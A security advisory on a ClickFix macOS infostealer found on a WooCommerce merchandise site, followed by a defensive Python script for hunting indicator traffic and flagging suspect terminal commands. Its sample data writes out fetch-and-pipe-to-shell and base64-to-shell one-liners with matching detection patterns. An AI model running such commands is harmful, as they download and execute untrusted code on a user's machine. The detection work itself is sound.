FBI Director Kash Patel's merchandise site (basedapparel.com) infected with WooCommerce ClickFix macOS infostealer; site taken offline
FBI Director Kash Patel's merchandise website basedapparel[.]com was taken offline on Friday after researchers documented a multi-stage WooCommerce compromise that stole payment data and targeted Mac users with a ClickFix attack. The site displayed a fake Cloudflare CAPTCHA prompting visitors to paste a command into their terminal; the macOS-specific shell command then downloaded a script-based infostealer that targets browsers, password vaults, and cryptocurrency wallets before compressing the data, exfiltrating it to monterushy[.]com, and deleting itself. Researchers WifiRumHam and 'debbie' analyzed the live campaign on May 21-22; the site went offline on May 22. Similar infections have been seen across many compromised WooCommerce sites.
- Check: Search outbound traffic for connections to monterushy[.]com and similar ClickFix C2 hosts since early May. Inventory WooCommerce sites your organization operates and confirm plugin integrity.
- Affected: WooCommerce-powered e-commerce sites with vulnerable or unverified plugins. Mac users who visit compromised storefronts and are prompted to paste shell commands. Brand reputation risk for high-profile site owners.
- Fix: Block monterushy[.]com at egress. Audit WooCommerce plugin authenticity via official channels. Train users (especially macOS) to never paste shell commands from a website. Apply EDR rules for ClickFix patterns.
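The following is an added example, not code from the researchers or from the original write-up, showing how the "Check" hunt and the "Fix" EDR rule above can be scripted. It assumes a proxy/DNS export in a simple `timestamp client host action` line format and an EDR process export of `(parent, command line)` pairs; both formats, the sample log lines, the cutoff date for "early May", and the ClickFix command-line heuristics (remote content or base64-decoded data piped into a shell from a terminal) are assumptions made for the example. The only indicator taken from the report is the monterushy[.]com domain.

```python
import re
from datetime import datetime

# Indicator from the report above, re-fanged for matching. Add further
# ClickFix C2 hosts from your own threat intel feed here.
IOC_DOMAINS = {"monterushy.com"}

# Constructed sample proxy/DNS log (not from the incident). The
# "<timestamp> <client> <dest_host> <action>" shape is an assumption.
SAMPLE_PROXY_LOG = """\
2025-05-20T14:02:11Z 10.1.4.23 www.example.org ALLOW
2025-05-21T09:17:45Z 10.1.4.57 monterushy.com ALLOW
2025-05-21T09:17:46Z 10.1.4.57 cdn.monterushy.com ALLOW
2025-05-22T18:30:02Z 10.1.4.88 updates.vendor.example ALLOW
2025-04-30T08:00:00Z 10.1.4.12 monterushy.com ALLOW
"""

LOG_RE = re.compile(r"^(\S+)\s+(\S+)\s+(\S+)\s+(\S+)$")
# "since early May" in the advisory; 1 May is an assumed cutoff.
SINCE = datetime(2025, 5, 1)


def host_matches_ioc(host, iocs=IOC_DOMAINS):
    """True if host is an IoC domain or a subdomain of one (case-insensitive)."""
    host = host.lower().rstrip(".")
    return any(host == d or host.endswith("." + d) for d in iocs)


def hunt_proxy_log(text, since=SINCE, iocs=IOC_DOMAINS):
    """Return (timestamp, client, host) for every IoC contact at or after `since`."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line.strip())
        if not m:
            continue  # skip malformed lines rather than abort the hunt
        ts, client, host, _action = m.groups()
        when = datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ")
        if when >= since and host_matches_ioc(host, iocs):
            hits.append((ts, client, host))
    return hits


# Constructed EDR process events as (parent process, command line).
# The payload URL is a placeholder, not an indicator from the report.
SAMPLE_PROCESS_EVENTS = [
    ("Terminal", "brew update"),
    ("Terminal", "curl -fsSL https://stage.example.invalid/x.sh | bash"),
    ("Terminal", "echo 'Y3VybCAuLi4=' | base64 -D | sh"),
    ("Xcode", "xcodebuild -scheme App"),
]

# Heuristics (assumed, not from the report): ClickFix lures have the victim
# paste a one-liner into a terminal that fetches or decodes a payload and
# hands it straight to a shell interpreter.
TERMINAL_PARENTS = {"terminal", "iterm2"}
DOWNLOAD_TOOLS = re.compile(r"\b(curl|wget)\b", re.I)
PIPE_TO_SHELL = re.compile(r"\|\s*(ba|z|k)?sh\b", re.I)
BASE64_DECODE = re.compile(r"\bbase64\s+(-d|-D|--decode)\b")


def clickfix_suspect(parent, cmdline):
    """Return the list of reasons a command line matches the ClickFix heuristics."""
    reasons = []
    if parent.lower() not in TERMINAL_PARENTS:
        return reasons  # only user-typed (pasted) terminal commands are in scope
    if DOWNLOAD_TOOLS.search(cmdline) and PIPE_TO_SHELL.search(cmdline):
        reasons.append("remote content piped into a shell")
    if BASE64_DECODE.search(cmdline) and PIPE_TO_SHELL.search(cmdline):
        reasons.append("base64-decoded payload piped into a shell")
    return reasons


def triage_process_events(events):
    """Return (parent, cmdline, reasons) for every event that trips a heuristic."""
    flagged = []
    for parent, cmdline in events:
        reasons = clickfix_suspect(parent, cmdline)
        if reasons:
            flagged.append((parent, cmdline, reasons))
    return flagged


if __name__ == "__main__":
    for hit in hunt_proxy_log(SAMPLE_PROXY_LOG):
        print("IoC contact:", *hit)
    for parent, cmdline, reasons in triage_process_events(SAMPLE_PROCESS_EVENTS):
        print(f"ClickFix suspect [{parent}] {cmdline}: {', '.join(reasons)}")
```

The subdomain match in `host_matches_ioc` matters because blocklists keyed on the exact apex miss `cdn.` or similar hosts under the same domain, while the `endswith("." + d)` form avoids false positives on look-alike names such as `notmonterushy.com`. The process heuristics will also fire on legitimate `curl ... | sh` installers, so treat them as a triage signal to pair with the egress block rather than an automatic kill rule.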